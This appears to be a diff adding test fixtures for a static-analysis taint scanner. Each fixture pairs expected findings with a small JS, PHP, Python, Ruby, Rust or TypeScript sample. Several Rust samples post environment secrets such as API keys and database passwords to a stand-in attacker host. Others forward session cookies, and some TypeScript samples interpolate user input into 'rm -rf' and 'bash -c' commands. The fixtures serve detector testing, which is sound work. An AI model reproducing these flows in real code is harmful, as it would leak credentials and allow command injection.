"description": "Async/await DATA_EXFIL parity: an `await fetch(URL, {body: ...})` call with a Sensitive cookie source must fire DATA_EXFIL on the body field (no SSRF — destination is a fixed literal). Awaits do not strip taint; the cap split is preserved across the await edge identically to the synchronous fetch path.",
"tags": ["taint", "data-exfil", "fetch", "async", "await", "cookie", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [13, 16],
"notes": "req.cookies.session → JSON.stringify into await fetch body. Await must not silence the cap."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [13, 16],
"notes": "fetch URL is a fixed literal — body taint must not fire as SSRF."
}
]
}

View file

@ -0,0 +1,18 @@
var express = require('express');
var app = express();
// Async/await DATA_EXFIL: `await fetch(...)` must preserve the cap
// split. The destination URL is a fixed string literal (so SSRF must
// NOT fire) but a Sensitive cookie source threads through the body
// channel of the awaited call, so `Cap::DATA_EXFIL` MUST fire on the
// body field. Awaiting a Promise does not strip taint — the SSA lowering
// preserves chained await values across .then/.await edges identically
// to the synchronous fetch case.
app.post('/sync-async', async function (req, res) {
var sid = req.cookies.session; // source: session cookie
await fetch('https://analytics.internal/track', { // awaited call; destination is a string literal
method: 'POST',
body: JSON.stringify({ session: sid }), // cookie value serialized inline into the body
});
res.status(204).end();
});

View file

@ -0,0 +1,13 @@
{
"description": "Constructor cap narrowing: env secret flowing through `new Stripe(key)` must not propagate FILE_IO into the wrapper, so SDK-method-returned property values written to a file do not flag a phantom path-traversal flow.",
"tags": ["taint", "file_io", "constructor", "sdk", "negative", "regression-fp"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [9, 16],
"notes": "process.env.STRIPE_SECRET_KEY → new Stripe(key) → stripe.prices.create() → price.id → fs.writeFileSync — wrapper-object construction strips FILE_IO."
}
]
}

View file

@ -0,0 +1,17 @@
// Constructor cap narrowing: a third-party SDK client constructed from an
// env-derived secret returns objects whose string properties are
// SDK-generated, not derived from the secret in any path-shaped sense.
// `Cap::all()` flowing through `new Stripe(key)` must drop FILE_IO so
// downstream `fs.writeFileSync` of an SDK property does not flag a phantom
// path-traversal flow.
var fs = require('fs');
var key = process.env.STRIPE_SECRET_KEY;
var stripe = new Stripe(key);
async function setup() {
var price = await stripe.prices.create({ unit_amount: 9599 });
var line = 'PRICE_ID="' + price.id + '"';
fs.writeFileSync('./out.env', line);
}
setup();

View file

@ -0,0 +1,19 @@
{
"description": "Session-id forwarder: req.cookies.session (Sensitive-tier source) flows into a fixed-URL fetch body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Pairs with fetch_tainted_body_safe.js (Plain source, silenced) to assert the source-sensitivity gate routes per-tier rather than globally.",
"tags": ["taint", "data-exfil", "fetch", "sensitivity-gate", "cookie", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [10, 17],
"notes": "fetch URL is a fixed literal — body taint must not fire as SSRF."
},
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [10, 17],
"notes": "req.cookies.session → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body field."
}
]
}

View file

@ -0,0 +1,18 @@
var express = require('express');
var app = express();
// Session-id forwarder: an internal handler proxies the user's session
// cookie into the body of an outbound request to a fixed analytics URL.
// The destination is hardcoded so SSRF must NOT fire, but the source is
// Sensitive-tier (cookie carries auth material) so Cap::DATA_EXFIL MUST
// fire — operator-bound state is leaving the process via the request
// payload.
app.get('/sync', function(req, res) {
var sid = req.cookies.session;
fetch('https://analytics.internal/track', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ session: sid }),
});
res.status(204).end();
});

View file

@ -1,6 +1,6 @@
{
"description": "fetch() with a fixed destination URL and an attacker-controlled body. SSRF must NOT fire (destination is not attacker-influenced) and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) MUST fire on the body field.",
"tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution"],
"description": "fetch() with a fixed destination URL and a plain user-input body (req.body.message). SSRF must NOT fire (destination is not attacker-influenced) and DATA_EXFIL must NOT fire either: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL).",
"tags": ["taint", "data-exfil", "fetch", "destination-aware", "cap-attribution", "sensitivity-gate"],
"modes": ["full"],
"expected": [
{
@ -11,9 +11,9 @@
},
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"must_not_match": true,
"line_range": [7, 14],
"notes": "Body field carries req.body.message → must fire DATA_EXFIL (sensitive data leaving the process via outbound request payload)."
"notes": "Body source is plain user input (req.body.message → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, headers, env, db, file) — plain user input echoed into a request body is not data exfiltration. See fetch_body_user_input_silenced.js for the unit-level regression."
}
]
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_setopt($ch, CURLOPT_POSTFIELDS, $payload) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a define-style identifier via the macro-arg fallback, narrowing the gate so DATA_EXFIL fires only at the body-binding setopt call. The cookie source is Sensitivity::Sensitive so DATA_EXFIL must fire. The CURLOPT_RETURNTRANSFER setopt on the next line must NOT trigger the gate (different option, not a body slot).",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [3, 10],
"notes": "$_COOKIE['auth_token'] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,10 @@
<?php
function leak_session() {
$token = $_COOKIE['auth_token'];
$ch = curl_init('https://analytics.internal/track');
curl_setopt($ch, CURLOPT_POSTFIELDS, "session={$token}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
curl_close($ch);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source ($_POST). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.php to assert per-tier routing for PHP.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [3, 9],
"notes": "Body source is plain user input ($_POST → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,9 @@
<?php
function forward_message() {
$msg = $_POST['message'];
$ch = curl_init('https://telemetry.internal/forward');
curl_setopt($ch, CURLOPT_POSTFIELDS, "message={$msg}");
curl_exec($ch);
curl_close($ch);
}

View file

@ -0,0 +1,19 @@
{
"description": "Container-taint DATA_EXFIL: payload dict accumulates os.environ.get() secrets across multiple keys, then flows into requests.post(json=payload). The SSA heap Elements slot carries the cap from each `payload[k] = ...` store to the sink-side heap-load, so DATA_EXFIL must fire on the json field. Mirrors `array_push_data_exfil.js` / `map_assign_data_exfil.go` for cross-language container-taint coverage.",
"tags": ["taint", "data-exfil", "requests", "container", "heap-elements", "env", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [18, 22],
"notes": "Dict population with env secrets, then requests.post(json=...). Container-taint round-trip must fire DATA_EXFIL on the json field."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [18, 22],
"notes": "Destination URL is a fixed literal — body taint must not surface as SSRF."
}
]
}

View file

@ -0,0 +1,23 @@
import os
import requests
from flask import Flask, request
app = Flask(__name__)
# Container-taint DATA_EXFIL: a dict accumulates env-config secrets across
# keys, then is forwarded as the JSON body of an outbound POST to a fixed
# URL. The Python SSA heap model marks the dict's `Elements` slot tainted
# at every `payload[k] = ...` write; the sink-side
# `collect_tainted_sink_values` heap-loads the same slot when checking the
# `json` kwarg, so DATA_EXFIL must fire on the json field even though
# `payload` itself is not directly tainted by an Assign. Pairs with
# `httpx_async_post_data_exfil.py` (single-key dict literal — no
# container-mutation step).
@app.route('/upload-config', methods=['POST'])
def upload_config():
payload = {}
payload['api_key'] = os.environ.get('UPSTREAM_API_KEY')
payload['region'] = os.environ.get('UPSTREAM_REGION')
requests.post('https://api.internal/ingest', json=payload)
return 'ok'

View file

@ -0,0 +1,13 @@
{
"description": "Async DATA_EXFIL via httpx.AsyncClient: os.environ.get() (EnvironmentConfig — Sensitive-tier) flows into the json kwarg of an async client.post() call against a fixed URL. The receiver type resolves to HttpClient so the gated DATA_EXFIL fires via the type-qualified `HttpClient.post` matcher; the destination is hardcoded so SSRF must NOT fire.",
"tags": ["taint", "data-exfil", "httpx", "async", "type-qualified", "sensitivity-gate"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [15, 20],
"notes": "os.environ → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the json kwarg of HttpClient.post."
}
]
}

View file

@ -0,0 +1,20 @@
import os
from fastapi import FastAPI, Request
import httpx
app = FastAPI()
# Async data-exfil path: an `httpx.AsyncClient` instance dispatches a POST
# whose `json` kwarg embeds an environment-config secret. The chained-call
# normalization collapses `httpx.AsyncClient().post` to the gate matcher
# `httpx.AsyncClient.post` so the gated DATA_EXFIL fires. Source is
# Sensitivity::Sensitive (EnvironmentConfig) so DATA_EXFIL MUST fire on the
# json kwarg; the destination URL is fixed so SSRF must NOT fire.
@app.post('/sync-async')
async def sync_async(req: Request):
api_key = os.environ.get('UPSTREAM_API_KEY')
await httpx.AsyncClient().post(
'https://upstream.internal/ingest',
json={'api_key': api_key},
)
return {'ok': True}

View file

@ -0,0 +1,13 @@
{
"description": "Session-token forwarder: flask `session` (Sensitive-tier source) flows into a fixed-URL requests.post body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Mirrors the JS fetch_session_forward case for Python.",
"tags": ["taint", "data-exfil", "requests", "sensitivity-gate", "session", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [12, 18],
"notes": "session.get('user_token') → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the json kwarg of requests.post."
}
]
}

View file

@ -0,0 +1,18 @@
from flask import Flask, request, session
import requests
app = Flask(__name__)
# Sensitive-source forwarder: the Flask session cookie carries auth material
# and is being forwarded to a fixed analytics URL via the request body. The
# destination is hardcoded so SSRF must NOT fire, but the source is
# Sensitivity::Sensitive (session ↔ Cookie) so DATA_EXFIL MUST fire — the
# auth-bearing operator state is leaving the process via the outbound payload.
@app.route('/sync')
def sync_session():
sid = session.get('user_token')
requests.post(
'https://analytics.internal/track',
json={'session': sid},
)
return '', 204

View file

@ -0,0 +1,19 @@
{
"description": "requests.post(taintedUrl, json={fixed}) — destination-aware case for Python. URL is tainted (SSRF), body is fixed. SSRF must fire and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) must NOT fire — the two classes share the callee but cap attribution is per-position.",
"tags": ["taint", "ssrf", "requests", "destination-aware", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_match": true,
"line_range": [13, 18],
"notes": "request.args.get('target') → requests.post(target, json={...}) — tainted URL fires SSRF."
},
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [13, 18],
"notes": "Body json kwarg is a fixed literal — DATA_EXFIL must NOT fire on this site (regression guard for per-cap attribution)."
}
]
}

View file

@ -0,0 +1,18 @@
from flask import Flask, request
import requests
app = Flask(__name__)
# URL-only taint: the destination URL is attacker-controlled but the body is
# a fixed literal. SSRF must fire on the URL flow. DATA_EXFIL must NOT fire
# because no body kwarg carries taint (regression guard for per-cap
# attribution — the two classes share the callee but cap routing is per
# argument position).
@app.route('/proxy', methods=['POST'])
def proxy():
target = request.args.get('target')
requests.post(
target,
json={'event': 'proxy_call'},
)
return '', 204

View file

@ -0,0 +1,13 @@
{
"description": "requests.post() with a fixed destination URL and a plain user-input body (request.form). DATA_EXFIL must NOT fire: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL). Pairs with requests_post_session_token.py to assert per-tier routing for Python.",
"tags": ["taint", "data-exfil", "requests", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [13, 19],
"notes": "Body source is plain user input (request.form → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, sessions, headers, env) — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,19 @@
from flask import Flask, request
import requests
app = Flask(__name__)
# Plain user input echoed back into a fixed-URL request body. The destination
# is hardcoded so SSRF must NOT fire. DATA_EXFIL must NOT fire either: the
# source is Sensitivity::Plain (request.form is raw user input) and the
# source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL.
# Echoing the user's own data back to telemetry is not a cross-boundary
# disclosure — it is exactly what the API gateway pattern does.
@app.route('/forward', methods=['POST'])
def forward_message():
payload = request.form.get('message')
requests.post(
'https://telemetry.internal/forward',
data={'message': payload},
)
return '', 204

View file

@ -0,0 +1,13 @@
{
"description": "Net::HTTP.post(uri, body) with the body interpolating a session cookie value. Destination is fixed so SSRF must NOT fire on the URL flow, but DATA_EXFIL MUST fire — request.cookies is Sensitivity::Sensitive and the auth-bearing operator state is leaving the process via the outbound payload.",
"tags": ["taint", "data-exfil", "net-http", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 7],
"notes": "request.cookies[:auth_token] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body of Net::HTTP.post."
}
]
}

View file

@ -0,0 +1,8 @@
require 'net/http'
require 'uri'
def forward_session(request)
sid = request.cookies[:auth_token]
uri = URI('https://analytics.internal/track')
Net::HTTP.post(uri, "session=#{sid}")
end

View file

@ -0,0 +1,13 @@
{
"description": "RestClient.post() with a fixed destination URL and a plain user-input body (params[:message]). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_net_http_post.rb to assert per-tier routing for Ruby.",
"tags": ["taint", "data-exfil", "rest-client", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [3, 9],
"notes": "Body source is plain user input (params → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,9 @@
require 'rest-client'
def forward_message(params)
message = params[:message]
RestClient.post(
'https://telemetry.internal/forward',
{ message: message }.to_json
)
end

View file

@ -0,0 +1,31 @@
{
"description": "DATA_EXFIL: env::var flows to hyper::Request::builder().body() chain.",
"tags": ["taint", "data_exfil", "hyper"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [5, 12],
"evidence_contains": [],
"notes": "env-config secret flows into hyper Request::builder().body() body-bind, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [5, 7],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [7, 12],
"evidence_contains": [],
"notes": ".unwrap() on Request::builder().body() Result"
}
]
}

View file

@ -0,0 +1,12 @@
// DATA_EXFIL: env-config flows into hyper Request::builder().body(payload).
// The body-bind step on the request builder is itself the leak point;
// the `Request::builder.body` chain matcher (with `.unwrap` peel) fires
// DATA_EXFIL on the build statement.
fn exfil_hyper() {
let secret = std::env::var("LICENSE_KEY").unwrap();
let _req = hyper::Request::builder()
.method("POST")
.uri("https://attacker.example.com/collect")
.body(secret)
.unwrap();
}

View file

@ -0,0 +1,19 @@
{
"description": "Async DATA_EXFIL parity: client.post(URL).body(secret).send().await preserves the cap split identically to the synchronous .send() case. The chained-call normalization peels the trailing .await so the body-binding matcher resolves; awaiting cannot strip taint.",
"tags": ["taint", "data-exfil", "reqwest", "async", "await", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [9, 14],
"notes": "env::var secret → .body(secret).send().await must fire DATA_EXFIL on the body channel."
},
{
"rule_id": "rs.quality.unwrap",
"must_match": true,
"line_range": [9, 10],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,15 @@
// Async DATA_EXFIL: `client.post(URL).body(payload).send().await` must
// preserve the cap split identically to the synchronous `.send()` case
// in `data_exfil_reqwest_body.rs`. The chained-call normalization
// collapses `.send().await` to the body-binding chain matcher (the
// peel-identity-suffix step strips `.await` before suffix matching) so
// DATA_EXFIL fires on the body channel. URL is hardcoded, so SSRF must
// not fire.
async fn leak_secret_async() {
let secret = std::env::var("API_KEY").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.body(secret)
.send()
.await;
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to reqwest Client::post().body(secret).send() chain.",
"tags": ["taint", "data_exfil", "reqwest"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [6, 12],
"evidence_contains": [],
"notes": "env-config secret flows into reqwest .body() body-bind chain, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [6, 8],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,12 @@
// DATA_EXFIL: env-config (Sensitive) flows into reqwest's `.body()` chain.
// The all-in-one chain `Client::new().post(url).body(payload).send()`
// reduces to chain text containing `body.send`, so the body-binding chain
// matcher fires DATA_EXFIL and not SSRF. URL is hardcoded so SSRF must
// not fire on this finding.
fn leak_secret() {
let secret = std::env::var("API_KEY").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.body(secret)
.send();
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to reqwest Client::post().form(&secret).send() chain.",
"tags": ["taint", "data_exfil", "reqwest"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [4, 10],
"evidence_contains": [],
"notes": "env-config secret flows into reqwest .form() body-bind chain, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [4, 6],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: env-config flows into reqwest's `.form()` chain. The
// form-encoded payload leaks the operator-bound secret, so DATA_EXFIL
// fires at the chain via the `form.send` body-bind suffix matcher.
fn exfil_form() {
let secret = std::env::var("OAUTH_REFRESH_TOKEN").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.form(&secret)
.send();
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to reqwest Client::post().json(&secret).send() chain.",
"tags": ["taint", "data_exfil", "reqwest"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [4, 10],
"evidence_contains": [],
"notes": "env-config secret flows into reqwest .json() body-bind chain, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [4, 6],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,10 @@
// DATA_EXFIL: env-config flows into reqwest's `.json()` chain. The
// JSON-encoded body still leaks the operator-bound secret, so DATA_EXFIL
// fires at the chain via the `json.send` body-bind suffix matcher.
fn exfil_json() {
let secret = std::env::var("DATABASE_PASSWORD").unwrap();
let _ = reqwest::Client::new()
.post("https://attacker.example.com/collect")
.json(&secret)
.send();
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to surf::post().body_string() chain.",
"tags": ["taint", "data_exfil", "surf"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [5, 9],
"evidence_contains": [],
"notes": "env-config secret flows into surf .body_string body-bind, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [5, 7],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,9 @@
// DATA_EXFIL: env-config flows into surf's body-binding terminal verb.
// `surf::post(url).body_string(payload)` is the body-bind step; the
// `body_string` bare matcher fires DATA_EXFIL because the method name
// is unambiguous in Rust HTTP-client code.
fn exfil_surf() {
let secret = std::env::var("APP_SECRET").unwrap();
let _ = surf::post("https://attacker.example.com/collect")
.body_string(secret);
}

View file

@ -0,0 +1,23 @@
{
"description": "DATA_EXFIL: env::var flows to ureq::post().send_string() chain.",
"tags": ["taint", "data_exfil", "ureq"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [4, 8],
"evidence_contains": [],
"notes": "env-config secret flows into ureq .send_string, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [4, 6],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,8 @@
// DATA_EXFIL: env-config flows into ureq's combined body-bind/dispatch
// terminal verb. `ureq::post(url).send_string(payload)` consumes the
// payload; the `send_string` bare matcher fires DATA_EXFIL.
fn exfil_ureq() {
let secret = std::env::var("ADMIN_TOKEN").unwrap();
let _ = ureq::post("https://attacker.example.com/collect")
.send_string(&secret);
}

View file

@ -0,0 +1,31 @@
{
"description": "Regression: URL-only chain (no body-bind) fires SSRF only, no DATA_EXFIL.",
"tags": ["taint", "ssrf", "regression"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"severity": null,
"must_match": true,
"line_range": [8, 9],
"evidence_contains": [],
"notes": "URL flows to reqwest Client::new().post(&url) — SSRF must fire"
},
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_not_match": true,
"line_range": [8, 9],
"evidence_contains": [],
"notes": "No body-binding step in chain — DATA_EXFIL must NOT fire"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [8, 9],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
}
]
}

View file

@ -0,0 +1,10 @@
// Regression: a tainted URL flowing through a reqwest chain *without*
// a body-binding step must fire SSRF (taint-unsanitised-flow) but must
// NOT fire DATA_EXFIL. The chain text reduces to `Client::new.post`
// with no `body|json|form|multipart` segment, so the body-bind chain
// matcher cannot attach. Guards against the new chain-aware DATA_EXFIL
// rule over-firing on pure URL flows.
fn fetch_url_only() {
let url = std::env::var("TARGET_URL").unwrap();
let _ = reqwest::Client::new().post(&url).send();
}

View file

@ -0,0 +1,14 @@
{
"description": "Regression guard for for-of array-destructure taint propagation. Without the fix, taint stops at `files` and never reaches `filePath` inside the loop body.",
"tags": ["taint", "shell-injection", "for-of", "destructure", "typescript"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_match": true,
"line_range": [12, 16],
"evidence_contains": [],
"notes": "TP: req.body.files → Object.entries → destructured filePath → exec template literal. Fires only when the for_in_statement's pattern bindings are registered as defines."
}
]
}

View file

@ -0,0 +1,19 @@
// Regression guard for the for-of-with-array-destructure taint propagation
// fix: `for (const [a, b] of Object.entries(tainted))` must propagate the
// iterable's taint to the destructured bindings, otherwise patterns like
// the docker.ts shell-injection (where filePath is bound by destructure-iter
// from a tainted parameter) silently lose the flow.
import express from "express";
const app = express();
const { exec } = require("child_process");
app.post("/files", async (req: any, res: any) => {
const files = req.body.files;
for (const [filePath, content] of Object.entries(files)) {
// TP: filePath is destructured from Object.entries(files) where files
// carries taint. Without the for-of pattern handler the binding
// is never registered as a definition and taint stops at `files`.
exec(`rm -rf /tmp/${filePath}`);
}
res.send("ok");
});

View file

@ -0,0 +1,38 @@
{
"description": "Regression guard: static shell payloads, non-shell arrays, canonical Dockerode argv, opaque array vars, and execSync(cmd, { env: process.env }) must not fire SHELL_ESCAPE.",
"tags": ["taint", "shell-injection", "shell-array", "regression-guard", "typescript"],
"modes": ["full"],
"strict_unexpected": ["taint-unsanitised-flow"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [13, 18],
"notes": "Constant shell payload — no idents in element 2, detector emits no sink filter."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [20, 26],
"notes": "First element is not a known shell — detector ignores even though element 2 is tainted."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [28, 34],
"notes": "Canonical Dockerode argv form — constant array, locked in by EXCLUDES."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [37, 43],
"notes": "Opaque variable, not a literal — detector inspects only literal arrays."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [46, 49],
"notes": "execSync(cmd, { env: process.env }) — arg 1 is the options object, not the command. Locked in by =execSync gate's payload_args: &[0]."
}
]
}

View file

@ -0,0 +1,52 @@
// Negative regression: shell-arrays whose payload is a static literal must
// not fire (no taint can reach a constant), and array literals whose first
// element is not a known shell must not fire even with taint in element 2.
// Also locks in the three FPs documented in the recent EXCLUDES carve-out:
// the canonical Dockerode `container.exec({ Cmd: argv })` form, an opaque
// untainted-array variable, and `execSync(cmd, { env: process.env })`.
import Docker from "dockerode";
const docker = new Docker({ socketPath: "/var/run/docker.sock" });
async function inert(_id: string, _cmd: string[]): Promise<void> {}
export async function staticShellPayload(req: any): Promise<void> {
// Constant payload — the third element (index 2) is a literal string. Even
// though the array shape matches [bash, -c, *], no identifiers exist in that
// element, so the detector emits no sink filter.
await inert("c", ["bash", "-c", "ls -la /app"]);
}
export async function nonShellArray(req: any): Promise<void> {
const tainted = req.query.cmd;
// First element ("ls") is not a known shell. Detector should not match even
// though element 2 (`tainted`) carries taint.
await inert("c", ["ls", "-la", tainted]);
}
export async function dockerodeCanonicalArgv(
containerId: string,
req: any
): Promise<void> {
const container = docker.getContainer(containerId);
// Canonical Dockerode shape: argv is passed directly to execve, no shell
// parsing. Constant array — must not fire, locked in by EXCLUDES.
await container.exec({ Cmd: ["ls", "-la"], AttachStdout: true });
}
export async function dockerodeOpaqueArrayVar(
containerId: string,
argv: string[]
): Promise<void> {
const container = docker.getContainer(containerId);
// `Cmd` is the variable `argv`, not an array literal — detector inspects only literal arrays.
await container.exec({ Cmd: argv, AttachStdout: true });
}
export async function execSyncWithEnv(_req: any): Promise<void> {
const { execSync } = require("child_process");
// Existing carve-out: the env arg is never a shell-injection payload; the
// bare destructured-import `execSync` gate (=execSync) restricts
// payload_args to arg 0 (the command string). Locked in.
execSync("npx playwright test", { env: process.env });
}

View file

@ -0,0 +1,14 @@
{
"description": "Shell-injection via [shell, '-c', tainted] array passed through a user-defined wrapper. Detection must fire at the array literal site without per-wrapper summary annotation.",
"tags": ["taint", "shell-injection", "shell-array", "typescript"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_match": true,
"line_range": [24, 29],
"evidence_contains": [],
"notes": "TP: req.query.name flows through the third array element of a [bash, -c, ...] shell-array passed to an opaque wrapper. The shell-array shape itself is the gate."
}
]
}

View file

@ -0,0 +1,31 @@
// Reproduces the docker.ts pattern: a user-defined wrapper passes a shell-array
// literal to an opaque helper that ultimately invokes the shell. The taint
// vector is the third array element (the shell command string) — a single
// quote inside the interpolated `name` breaks out of the surrounding `'...'`
// and runs arbitrary commands. Detection must fire at the wrapper call site
// without needing any summary annotation on `runShellWrapper`.
import express from "express";
const app = express();
async function runShellWrapper(_id: string, _cmd: string[]): Promise<string> {
// Opaque wrapper. In real code this dispatches to Dockerode
// `container.exec({Cmd: cmd})` — the shell-array recognition runs at the
// *outer* call site below, not here, because `container.exec` is excluded
// from flat sink classification on purpose (it accepts non-shell argv
// arrays in the canonical form).
return "";
}
app.get("/run", async (req: any, res: any) => {
const name = req.query.name;
// TP: `name` is interpolated inside a single-quoted shell context. A
// quote in `name` escapes the quoting and runs arbitrary shell commands.
// Detection must fire here, at the call site of the user wrapper, even
// though the wrapper is opaque to summary inference.
await runShellWrapper("container-id", [
"bash",
"-c",
`echo 'hello ${name}' > /tmp/out`,
]);
res.send("ok");
});